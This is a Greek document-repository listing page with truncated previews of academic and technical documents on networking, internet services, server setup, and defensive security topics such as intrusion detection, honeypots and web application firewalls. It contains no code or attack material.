6.2 Υπηρεσίες Διαδικτύου 6.2 Υπηρεσίες Διαδικτύου 1 / 34 Όλες οι υπηρεσίες στο Διαδίκτυο, όπως και πολλές εφαρμογές λογισμικού, στηρίζονται στο μοντέλο Πελάτη Εξυπηρετητή. 2 / 34 Σύμφωνα με αυτό το μοντέλο ο Εξυπηρετητής οργανώνει,

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 5 ΑΝΑΛΥΣΗ ΤΩΝ ΔΕΔΟΜΕΝΩΝ ΜΕ ΤΑ SNORT, ACID

ΚΕΦΑΛΑΙΟ 5 ΑΝΑΛΥΣΗ ΤΩΝ ΔΕΔΟΜΕΝΩΝ ΜΕ ΤΑ SNORT, ACID ΚΕΦΑΛΑΙΟ 5 ΑΝΑΛΥΣΗ ΤΩΝ ΔΕΔΟΜΕΝΩΝ ΜΕ ΤΑ SNORT, ACID Εισαγωγή Στο κεφάλαιο αυτό θα γίνει παρουσίαση των αποτελεσμάτων που έβγαλε το snort. Το snort είναι ένα network intrusion detection system το οποίο παρακολουθεί

Διαβάστε περισσότερα

Special edition of the Technical Chamber of Greece on Video Conference Services on the Internet, MICROSOFT CHAT v2.0

Special edition of the Technical Chamber of Greece on Video Conference Services on the Internet, MICROSOFT CHAT v2.0 MICROSOFT CHAT v2.0 A.S. DRIGAS Applied Technologies Department NCSR DEMOKRITOS Ag. Paraskevi GREECE dr@imm.demokritos.gr http://imm.demokritos.gr Το Microsoft Chat είναι το µόνο πρόγραµµα επικοινωνίας

Διαβάστε περισσότερα

Κεφάλαιο 1. Εισαγωγή Honeypots Honeynets

Κεφάλαιο 1. Εισαγωγή Honeypots Honeynets Εισαγωγή Honeypots Honeynets - Σελίδα 2 - Εισαγωγή Το Πρόβλημα O αυξανόμενος αριθμός επιθέσεων στο internet και η ανάγκη για την αντιμετώπιση τους δημιούργησε την ανάγκη απόκτησης εξειδικευμένης γνώσης

Διαβάστε περισσότερα

ΠΡΟΓΡΑΜΜΑΤΙΣΤΙΚΕΣ ΤΕΧΝΙΚΕΣ Σύντομη εισαγωγή στο εργαστήριο

ΠΡΟΓΡΑΜΜΑΤΙΣΤΙΚΕΣ ΤΕΧΝΙΚΕΣ Σύντομη εισαγωγή στο εργαστήριο ΠΡΟΓΡΑΜΜΑΤΙΣΤΙΚΕΣ ΤΕΧΝΙΚΕΣ Σύντομη εισαγωγή στο εργαστήριο Στο φετινό εργαστήριο του μαθήματος, έχετε τη δυνατότητα να δουλέψετε σε 2 περιβάλλοντα. Ένα σε περιβάλλον UNIX μέσω απομακρυσμένης σύνδεσης σε

Διαβάστε περισσότερα

Εφαρμογή Ηλεκτρονικής Διαχείρισης Μετεγγραφών

Εφαρμογή Ηλεκτρονικής Διαχείρισης Μετεγγραφών Εφαρμογή Ηλεκτρονικής Διαχείρισης Μετεγγραφών Παραδοτέο: Αναφορά Συντήρησης και Λειτουργίας της Εφαρμογής Συντήρηση Διαδικτυακής Πύλης και Εφαρμογών Πίνακας Περιεχομένων 1 Εργασίες συντήρησης της διαδικτυακής

Διαβάστε περισσότερα

ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ FORUM SITE

ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ FORUM SITE 15 Πρόλογος Οι οδηγίες που ακολουθούν αναφέρονται στα παρακάτω sites. Site Διεύθυνση Site Συντονιστικής Επιτροπής (ΣΕ) http://se-forum.cperi.certh.gr Site Επιστημονικού Γνωμοδοτικού http://egs-forum.cperi.certh.gr

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95

ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95 ΚΕΦΑΛΑΙΟ 4 Τεχνική Ανίχνευσης του ICMP Echo Spoofing Πτυχιακή Εργασία Σελίδα 95 Περιεχόμενα ΕΙΣΑΓΩΓΗ 98 ΜΕΡΟΣ Α: Έλεγχος του Icmp Echo Reply Πακέτου 103 A.1. Ανίχνευση του spoofed Icmp Echo Request Πακέτου.

Διαβάστε περισσότερα

Εργασία «Διαχείριση Δικτύων» Ιούνιος 2014, Θεσ/νίκη

Εργασία «Διαχείριση Δικτύων» Ιούνιος 2014, Θεσ/νίκη Εργασία «Διαχείριση Δικτύων» Ιούνιος 2014, Θεσ/νίκη 01 Εισαγωγή Μια απλή και γρήγορη εισαγωγή Το Splunk > είναι ένα πρόγραμμα το οποίο πρωτοεμφανίστηκε στην αγορά το 2003 και αποτελεί ένα πρόγραμμα εξόρυξης

Διαβάστε περισσότερα

Τεχνολογίες & Εφαρμογές Πληροφορικής

Τεχνολογίες & Εφαρμογές Πληροφορικής ΑΡΙΣΤΟΤΕΛΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΘΕΣΣΑΛΟΝΙΚΗΣ ΑΝΟΙΚΤΑ ΑΚΑΔΗΜΑΙΚΑ ΜΑΘΗΜΑΤΑ Τεχνολογίες & Εφαρμογές Πληροφορικής Ενότητα 5: Εγκατάσταση Απεγκατάσταση Εφαρμογών και Ιοί Ανδρέας Βέγλης, Αναπληρωτής Καθηγητής Άδειες

Διαβάστε περισσότερα

Τεχνική Οδηγία. Εγκατάσταση & ρύθμιση MS ISA Server 2000 στο περιβάλλον των σχολικών εργαστηρίων. Έκδοση 1.0. Ιανουάριος 2005

Τεχνική Οδηγία. Εγκατάσταση & ρύθμιση MS ISA Server 2000 στο περιβάλλον των σχολικών εργαστηρίων. Έκδοση 1.0. Ιανουάριος 2005 Πληροφοριακών Συστημάτων Σχολείων ΥΠΟΥΡΓΕΙΟ ΕΘΝΙΚΗΣ ΠΑΙΔΕΙΑΣ & ΘΡΗΣΚΕΥΜΑΤΩΝ ΕΠΙΧΕΙΡΗΣΙΑΚΟ ΠΡΟΓΡΑΜΜΑ Κοινωνία της Πληροφορίας Έργο: Δράσεις Υποστήριξης των Πληροφοριακών Συστημάτων των σχολείων Τεχνική

Διαβάστε περισσότερα

Σχεδιάζοντας Εφαρμογές για το Διαδίκτυο

Σχεδιάζοντας Εφαρμογές για το Διαδίκτυο FrontPage 2003 Πρακτικός Οδηγός Χρήσης Το FrontPage είναι ένα πρόγραμμα δημιουργίας ιστοσελίδων και δικτυακών τόπων που επιτρέπει το σχεδιασμό ιστοσελίδων μέσα από γραφικό περιβάλλον αλλά και την ταυτόχρονη

Διαβάστε περισσότερα

Διαχείριση Πληροφοριών στο Διαδίκτυο. Εργαστήριο 1

Διαχείριση Πληροφοριών στο Διαδίκτυο. Εργαστήριο 1 Διαχείριση Πληροφοριών στο Διαδίκτυο Εργαστήριο 1 Τεχνολογικό Εκπαιδευτικό Ίδρυμα Καβάλας Σχολή Διοίκησης & Οικονομίας Τμήμα Διαχείρισης Πληροφοριών Διδάσκων Μαρδύρης Βασίλειος, Διπλ. Ηλ. Μηχανικός & Μηχ.

Διαβάστε περισσότερα

Διάλεξη 7 η - Networks

Διάλεξη 7 η - Networks Διάλεξη 7 η - Networks Ομιλητής: Κιντσάκης Θάνος Σύνταξη - Επιμέλεια Διαφανειών: ü Αυδίκου Χριστίνα ü Κιντσάκης Θάνος ü Πάπιστας Γιάννης ü Τούμπας Κώστας De. Co. De Ορισμός Δικτύου Ένα δίκτυο είναι ένας

Διαβάστε περισσότερα

Εγκατάσταση IIS (Internet Information Server) 7.0 / 7.5 / 8.0

Εγκατάσταση IIS (Internet Information Server) 7.0 / 7.5 / 8.0 Εγκατάσταση IIS (Internet Information Server) 7.0 / 7.5 / 8.0 Ο IIS (Internet Information Server) είναι το λογισμικό εξυπηρετητή παγκόσμιου ιστού (web server) της Microsoft για την πλατφόρμα των Windows.

Διαβάστε περισσότερα

ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ. Τεχνολογίες και Εφαρμογές Διαδικτύου

ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ. Τεχνολογίες και Εφαρμογές Διαδικτύου ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ Τεχνολογίες και Εφαρμογές Διαδικτύου Τυπικά Χαρακτηριστικά Εφαρμογών Διαδικτύου Κατερίνα Πραματάρη Τεχνολογίες και Εφαρμογές Διαδικτύου

Διαβάστε περισσότερα

ΤΕΙ ΚΑΒΑΛΑΣ. Πτυχιακή εργασία ΕΙΣΑΓΩΓΗ. Μιλτιάδης Κακλαμάνης

ΤΕΙ ΚΑΒΑΛΑΣ. Πτυχιακή εργασία ΕΙΣΑΓΩΓΗ. Μιλτιάδης Κακλαμάνης Σελίδα 1από ΤΕΙ ΚΑΒΑΛΑΣ Πτυχιακή εργασία Δικτυακή Εφαρμογή διαχείρισης ηλεκτρονικών εγγράφων υπηρεσίας. ΕΙΣΑΓΩΓΗ Μιλτιάδης Κακλαμάνης Σελίδα 2από Κατάλογος περιεχομένων ΕΙΣΑΓΩΓΗ...1 Σχετιζόμενα πρόσωπα...3

Διαβάστε περισσότερα

Τμήμα Λογιστικής. Εισαγωγή στους Ηλεκτρονικούς Υπολογιστές. Μάθημα 10. 1 Στέργιος Παλαμάς

Τμήμα Λογιστικής. Εισαγωγή στους Ηλεκτρονικούς Υπολογιστές. Μάθημα 10. 1 Στέργιος Παλαμάς ΤΕΙ Ηπείρου Παράρτημα Πρέβεζας Τμήμα Λογιστικής Εισαγωγή στους Ηλεκτρονικούς Υπολογιστές Μάθημα 10 Δίκτυα Η/Υ, το Internet 1 Δίκτυα Πολλοί υπολογιστές μπορούν να συνδεθούν μεταξύ τους με χρήση του κατάλληλου

Διαβάστε περισσότερα

Τεχνική Οδηγία. Εγκατάσταση & ρύθµιση MS ISA Server 2000 στο περιβάλλον των σχολικών εργαστηρίων. Έκδοση 1.0. Ιανουάριος 2005

Τεχνική Οδηγία. Εγκατάσταση & ρύθµιση MS ISA Server 2000 στο περιβάλλον των σχολικών εργαστηρίων. Έκδοση 1.0. Ιανουάριος 2005 Πληροφοριακών Συστηµάτων Σχολείων ΥΠΟΥΡΓΕΙΟ ΕΘΝΙΚΗΣ ΠΑΙ ΕΙΑΣ & ΘΡΗΣΚΕΥΜΑΤΩΝ ΕΠΙΧΕΙΡΗΣΙΑΚΟ ΠΡΟΓΡΑΜΜΑ Κοινωνία της Πληροφορίας Έργο: ράσεις Υποστήριξης των Πληροφοριακών Συστηµάτων των σχολείων Τεχνική Οδηγία

Διαβάστε περισσότερα

Περί δικτύων. Δρ. Ματθαίος Πατρινόπουλος

Περί δικτύων. Δρ. Ματθαίος Πατρινόπουλος Περί δικτύων Δρ. Ματθαίος Πατρινόπουλος Η δομή και εφαρμογές του διαδικτύου Μοίρασμα πόρων Παροχή πρόσβασης σε Εξοικονόμηση χρημάτων Αμεσότητα επικοινωνίας Αυξημένη αξιοπιστία Εξυπηρέτηση επικοινωνιακών

Διαβάστε περισσότερα

Αντιµετώπιση των ανεπιθύµητων ηλεκτρονικών µηνυµάτων. Blocking spam mail. ηµήτρης Μπιµπίκας

Αντιµετώπιση των ανεπιθύµητων ηλεκτρονικών µηνυµάτων. Blocking spam mail. ηµήτρης Μπιµπίκας Αντιµετώπιση των ανεπιθύµητων ηλεκτρονικών µηνυµάτων Blocking spam mail ηµήτρης Μπιµπίκας 2 ΑΝΤΙΜΕΤΩΠΙΣΗ ΑΝΕΠΙΘΥΜΗΤΩΝ ΗΛΕΚΤΡΟΝΙΚΩΝ ΜΗΝΥΜΑΤΩΝ/ BLOCKING SPAM MAIL Αντιµετώπιση των ανεπιθύµητων ηλεκτρονικών

Διαβάστε περισσότερα

ΟΔΗΓΙΕΣ ΓΙΑ ΤΗ ΧΡΗΣΗ ΤΟΥ CONTROL PANEL RACKSPACE

ΟΔΗΓΙΕΣ ΓΙΑ ΤΗ ΧΡΗΣΗ ΤΟΥ CONTROL PANEL RACKSPACE ΟΔΗΓΙΕΣ ΓΙΑ ΤΗ ΧΡΗΣΗ ΤΟΥ CONTROL PANEL RACKSPACE Περιεχόμενα 1 Γενικά...2 2 Πρόσβαση στο Control Panel...2 3 Εμφάνιση Λίστας Domains...2 3.1 Καρτέλα General Settings...3 3.2 Καρτέλα Permissions...5 3.3

Διαβάστε περισσότερα

16PROC

16PROC Δ Ε Υ Α Ρ ΔΗΜΟΤΙΚΗ ΕΠΙΧΕΙΡΗΣΗ ΥΔΡΕΥΣΗΣ ΑΠΟΧΕΤΕΥΣΗΣ ΔΗΜΟΥ ΡΟΔΟΥ 2ο ΧΛΜ ΕΘΝ. ΟΔΟΥ ΡΟΔΟΥ-ΛΙΝΔΟΥ, 85100 ΡΟΔΟΣ - ΝΠΙΔ - ΑΦΜ 997562265 ΔOY ΡΟΔΟΥ ΤΗΛ: 22410 45300 FAX: 22410 45329 Email: gm@deyar.gr Ρόδος 20-10-2016

Διαβάστε περισσότερα

Σύστημα Διαχείρισης Περιεχομένου

Σύστημα Διαχείρισης Περιεχομένου Σύστημα Διαχείρισης Περιεχομένου Τι είναι ένα CMS Σύστημα διαχείρισης περιεχομένου - (Content Management System) Οργάνωση, ταξινόμηση και αρχειοθέτηση πληροφορίας Δημιουργία της υποδομής πάνω στην οποία

Διαβάστε περισσότερα

Κεφάλαιο 16 Ασφάλεια και Προστασία στο Διαδίκτυο. Εφαρμογές Πληροφορικής Κεφ. 16 Καραμαούνας Πολύκαρπος

Κεφάλαιο 16 Ασφάλεια και Προστασία στο Διαδίκτυο. Εφαρμογές Πληροφορικής Κεφ. 16 Καραμαούνας Πολύκαρπος Κεφάλαιο 16 Ασφάλεια και Προστασία στο Διαδίκτυο Εφαρμογές Πληροφορικής Κεφ. 16 Καραμαούνας Πολύκαρπος 16.1 Ασφάλεια υπολογιστικού συστήματος Κακόβουλο λογισμικό: το λογισμικό το οποίο εκ προθέσεως διαθέτει

Διαβάστε περισσότερα

Ενεργοποίηση του πρωτοκόλλου IPv6

Ενεργοποίηση του πρωτοκόλλου IPv6 Ενεργοποίηση του πρωτοκόλλου IPv6 Στις επόµενες παραγράφους περιγράφουµε τα βασικά βήµατα που πρέπει να ακολουθήσει ο τελικός χρήσης για µια αντιπροσωπευτική οµάδα λειτουργικών συστηµάτων ώστε να συνδεθεί

Διαβάστε περισσότερα

Ως Διαδίκτυο (Internet) ορίζεται το παγκόσμιο (διεθνές) δίκτυο ηλεκτρονικών υπολογιστών (international network).

Ως Διαδίκτυο (Internet) ορίζεται το παγκόσμιο (διεθνές) δίκτυο ηλεκτρονικών υπολογιστών (international network). ΙΔΡΥΜΑ ΝΕΟΛΑΙΑΣ ΚΑΙ ΔΙΑ ΒΙΟΥ ΜΑΘΗΣΗΣ ΥΠΗΡΕΣΙΕΣ ΔΙΑΔΙΚΤΥΟΥ Καλαμάτα, 2015 Το Διαδίκτυο Ως Διαδίκτυο (Internet) ορίζεται το παγκόσμιο (διεθνές) δίκτυο ηλεκτρονικών υπολογιστών (international network). Πρόκειται

Διαβάστε περισσότερα

ΔΙΚΤΥΑ. Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Π. Αγγελάτος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών

ΔΙΚΤΥΑ. Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Π. Αγγελάτος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών ΔΙΚΤΥΑ Διδάσκοντες: Π. Αγγελάτος, Δ. Ζήνδρος Επιμέλεια διαφανειών: Π. Αγγελάτος Σχολή Ηλεκτρολόγων Μηχανικών και Μηχανικών Υπολογιστών Άδεια Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης

Διαβάστε περισσότερα

Αν παρ όλα αυτά αντιμετωπίζετε πρόβλημα, επικοινωνήστε με το Κέντρο Δικτύου της ΑΣΠΑΙΤΕ Τηλ 210 2896709, 210 2896722, 210 2896721, noc@aspete.

Αν παρ όλα αυτά αντιμετωπίζετε πρόβλημα, επικοινωνήστε με το Κέντρο Δικτύου της ΑΣΠΑΙΤΕ Τηλ 210 2896709, 210 2896722, 210 2896721, noc@aspete. H υπηρεσία VPN προσφέρει τη δυνατότητα σε χρήστες της ΑΣΠΑΙΤΕ που συνδέονται στο Internet από άλλους φορείς (πχ ISP, άλλα ιδρύματα, κτλ) να αποκτούν ασφαλή πρόσβαση στο δίκτυο και στις υπηρεσίες της Σχολής.

Διαβάστε περισσότερα

Εγχειρίδιο χρήσης συστήματος ηλεκτρονικής αλληλογραφίας της Ελληνικής Ομοσπονδίας Μπριτζ

Εγχειρίδιο χρήσης συστήματος ηλεκτρονικής αλληλογραφίας της Ελληνικής Ομοσπονδίας Μπριτζ Εγχειρίδιο χρήσης συστήματος ηλεκτρονικής αλληλογραφίας της Ελληνικής Ομοσπονδίας Μπριτζ Ελληνική Ομοσπονδία Μπριτζ Σελίδα 1 / 8 Πίνακας περιεχομένων 1. Γενικά...3 2. Ρυθμίσεις για προχωρημένους...3 α.

Διαβάστε περισσότερα

Προγραμματισμός Ιστοσελίδων (Web Design)

Προγραμματισμός Ιστοσελίδων (Web Design) Προγραμματισμός Ιστοσελίδων (Web Design) Πανεπιστήμιο Πελοποννήσου Τμήμα Επιστήμης & Τεχνολογίας Τηλεπικοινωνιών Ευάγγελος Α. Κοσμάτος Ορισμός Web Ο Παγκόσμιος Ιστός (World Wide Web) ή απλά Web αποτελεί

Διαβάστε περισσότερα

SSH. Tutorial. Γιώργος Καππές

SSH. Tutorial. Γιώργος Καππές SSH Tutorial Γιώργος Καππές SSH Tutorial Το ssh (Secure Shell) είναι ένα ασφαλές δικτυακό πρωτόκολλο το οποίο επιτρέπει τη μεταφορά δεδομένων μεταξύ δύο υπολογιστών. Το ssh όχι μόνο κρυπτογραφεί τα δεδομένα

Διαβάστε περισσότερα

Τείχος Προστασίας Εφαρμογών Διαδικτύου

Τείχος Προστασίας Εφαρμογών Διαδικτύου Τείχος Προστασίας Εφαρμογών Διαδικτύου Web Application Firewalls Ιωάννης Στάης {istais@census-labs.com} Γιατί είναι σημαντική η προστασία των εφαρμογών ιστού; Πάνω από 70% όλων των επιθέσεων συμβαίνουν

Διαβάστε περισσότερα

Εργαλεία ανάπτυξης εφαρμογών internet Ι

Εργαλεία ανάπτυξης εφαρμογών internet Ι IEK ΟΑΕΔ ΚΑΛΑΜΑΤΑΣ ΤΕΧΝΙΚΟΣ ΕΦΑΡΜΟΓΩΝ ΠΛΗΟΦΟΡΙΚΗΣ Εργαλεία ανάπτυξης εφαρμογών internet Ι Διδάσκουσα: Κανελλοπούλου Χριστίνα ΠΕ19 Πληροφορικής 4 φάσεις διαδικτυακών εφαρμογών 1.Εφαρμογές στατικής πληροφόρησης

Διαβάστε περισσότερα

Αξιολόγηση της επίσημης Moodle Mobile εφαρμογής

Αξιολόγηση της επίσημης Moodle Mobile εφαρμογής Αξιολόγηση της επίσημης Moodle Mobile εφαρμογής ΣΕΜΙΝΑΡΙΟ ΕΚΠΑΙΔΕΥΤΙΚΟΥ ΛΟΓΙΣΜΙΚΟΥ ΑΛΕΞΑΝΔΡΟΣ ΚΑΝΤΑΣ ΠΡΩΤΟ ΣΕΜΙΝΑΡΙΟ ΔΕΥΤΕΡΟΥ ΚΥΚΛΟΥ ΕΚΠΑΙΔΕΥΣΗΣΗΣ ΜΟΝΑΔΕΣ ΑΡΙΣΤΕΙΑΣ ΠΑΝΕΠΙΣΤΗΜΙΟΥ ΚΡΗΤΗΣ Αυτή η εργασία

Διαβάστε περισσότερα

ΕΡΓΑΣΤΗΡΙΟ 1: Εισαγωγή, Χρήσιμες Εφαρμογές

ΕΡΓΑΣΤΗΡΙΟ 1: Εισαγωγή, Χρήσιμες Εφαρμογές ΕΡΓΑΣΤΗΡΙΟ 1: Εισαγωγή, Χρήσιμες Εφαρμογές Σκοπός του εργαστηρίου αυτού είναι η χρησιμοποίηση κάποιων εφαρμογών που θα μας φανούν πολύ χρήσιμες κατά τη διάρκεια του μαθήματος της Εισαγωγής στον Προγραμματισμό.

Διαβάστε περισσότερα

XEROX - ΕΛΤΙΟ ΑΣΦΑΛΕΙΑΣ XRX05-008

XEROX - ΕΛΤΙΟ ΑΣΦΑΛΕΙΑΣ XRX05-008 XEROX - ΕΛΤΙΟ ΑΣΦΑΛΕΙΑΣ XRX05-008 Η ευπάθεια του διακοµιστή διαδικτύου MicroServer της Xerox ενδέχεται να επιτρέψει µη εξουσιοδοτηµένη πρόσβαση. Το ακόλουθο λογισµικό και οι οδηγίες χρήστη παρέχονται για

Διαβάστε περισσότερα

Κεφάλαιο 7.3. Πρωτόκολλο TCP

Κεφάλαιο 7.3. Πρωτόκολλο TCP Κεφάλαιο 7.3 Πρωτόκολλο TCP Πρωτόκολλο TCP Το πρωτόκολλο Ελέγχου Μετάδοσης (Transmission Control Protocol, TCP) είναι το βασικό πρωτόκολο του Επιπέδου Μεταφοράς του μοντέλου TCP/IP. Παρέχει υπηρεσίες προσανατολισμένες

Διαβάστε περισσότερα

Κεφάλαιο 1. Δικτυακές Επιθέσεις, Μέθοδοι Υλοποίησής τους και Επιπτώσεις. Περιεχόμενα. Πτυχιακή Εργασία Σ ελίδα 1

Κεφάλαιο 1. Δικτυακές Επιθέσεις, Μέθοδοι Υλοποίησής τους και Επιπτώσεις. Περιεχόμενα. Πτυχιακή Εργασία Σ ελίδα 1 Κεφάλαιο 1 Δικτυακές Επιθέσεις, Μέθοδοι Υλοποίησης Τους και Επιπτώσεις. Περιεχόμενα Πτυχιακή Εργασία Σ ελίδα 1 Επιθέσεις... 4 Ορισμός...... 4 Ποιος είναι ο τυπικός στόχος-θύμα μίας επίθεσης.... 4 Πότε

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 12: Επίλυση Προβλημάτων Δικτύων Εισαγωγή

ΚΕΦΑΛΑΙΟ 12: Επίλυση Προβλημάτων Δικτύων Εισαγωγή ΚΕΦΑΛΑΙΟ 12: Επίλυση Προβλημάτων Δικτύων 12.1. Εισαγωγή Τα προβλήματα δικτύων είναι μια πολύ συνηθισμένη κατάσταση για τους περισσότερους χρήστες υπολογιστών. Στην ενότητα αυτή θα προσπαθήσουμε να καλύψουμε

Διαβάστε περισσότερα

Internet Τοπικό δίκτυο LAN Δίκτυο Ευρείας Περιοχής WAN Διαδίκτυο Πρόγραμμα Πλοήγησης φυλλομετρητής Πάροχοι Υπηρεσιών Internet URL HTML links

Internet Τοπικό δίκτυο LAN Δίκτυο Ευρείας Περιοχής WAN Διαδίκτυο Πρόγραμμα Πλοήγησης φυλλομετρητής Πάροχοι Υπηρεσιών Internet URL HTML links Internet Τοπικό δίκτυο (LAN Local Area Network): Δίκτυο όπου οι υπολογιστές βρίσκονται κοντά μεταξύ τους (μία εταιρία ή στην ίδια αίθουσα). Δίκτυο Ευρείας Περιοχής (WAN Wide Area Network) Δίκτυο όπου οι

Διαβάστε περισσότερα

Σύνδεση μέσω VPN στο εσωτερικό Δίκτυο του ΑΛΣ-ΕΛΑΚΤ

Σύνδεση μέσω VPN στο εσωτερικό Δίκτυο του ΑΛΣ-ΕΛΑΚΤ Σύνδεση μέσω VPN στο εσωτερικό Δίκτυο του ΑΛΣ-ΕΛΑΚΤ Η υπηρεσία Εικονικού Ιδιωτικού Δικτύου (Virtual Private Network) χρησιμοποιείται για την ασφαλή και κρυπτογραφημένη σύνδεση ενός απομακρυσμένου ηλεκτρονικού

Διαβάστε περισσότερα

Ασφάλεια Υπολογιστικών Συστημάτων

Ασφάλεια Υπολογιστικών Συστημάτων Ασφάλεια Υπολογιστικών Συστημάτων Ενότητα 5: Ασφάλεια Δικτύων Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για

Διαβάστε περισσότερα

Οδηγός Εγκατάστασης και Χρήσης του Arebas Easy

Οδηγός Εγκατάστασης και Χρήσης του Arebas Easy Σ ε λ ί δ α 1 Οδηγός Εγκατάστασης και Χρήσης του Arebas Easy Περιεχόμενα 1. Download Arebas Easy... 2 2. Εγκατάσταση Arebas Easy... 3 3. Εγγραφή στον Arebas Server... 7 4. Παραμετροποίηση Arebas Easy...

Διαβάστε περισσότερα

Πρωτόκολλα Επικοινωνίας και Τείχος Προστασίας

Πρωτόκολλα Επικοινωνίας και Τείχος Προστασίας Β5.1.2 Πρωτόκολλα Επικοινωνίας και Τείχος Προστασίας Τι θα μάθουμε σήμερα: Να ορίζουμε τι είναι πρωτόκολλο επικοινωνίας Να εξηγούμε τη χρησιμότητα των πρωτοκόλλων επικοινωνίας Να ονομάζουμε τα σημαντικότερα

Διαβάστε περισσότερα

Δυναμικές Ιστοσελίδες στο Πανελλήνιο Σχολικό Δίκτυο

Δυναμικές Ιστοσελίδες στο Πανελλήνιο Σχολικό Δίκτυο Δυναμικές Ιστοσελίδες στο Πανελλήνιο Σχολικό Δίκτυο Δρ. Χρήστος Όροβας Τεχνικός Υπεύθυνος 1 Διαδικασία «Φόρτωσης» μιας Ιστοσελίδας Internet Explorer, Mozilla, Chrome, κτλ HTTP Server ΠΣΔ Αίτημα για επικοινωνία

Διαβάστε περισσότερα

Linux με τη χρήση κονσόλας

Linux με τη χρήση κονσόλας Linux με τη χρήση κονσόλας Κεφάλαιο 2 Κείμενα Χρυσούλα Παπάζογλου Πανεπιστήμιο Μακεδονίας, Βιβλιοθήκη και Κέντρο Πληροφόρησης Υπηρεσία Ασύγχρονης Τηλεκπαίδευσης Θεσσαλονίκη, Μάρτης 2009 Το υλικό διατίθεται

Διαβάστε περισσότερα

Αν Ναι, δείτε πως με το λογισμικό axes μπορείτε!

Αν Ναι, δείτε πως με το λογισμικό axes μπορείτε! Θέλετε να μάθετε πως μπορείτε να έχετε πρόσβαση στις 5250 οθόνες μέσω browser, χωρίς αλλαγή στις υπάρχουσες εφαρμογές και χωρίς εγκατάσταση στον client? Αν Ναι, δείτε πως με το λογισμικό axes μπορείτε!

Διαβάστε περισσότερα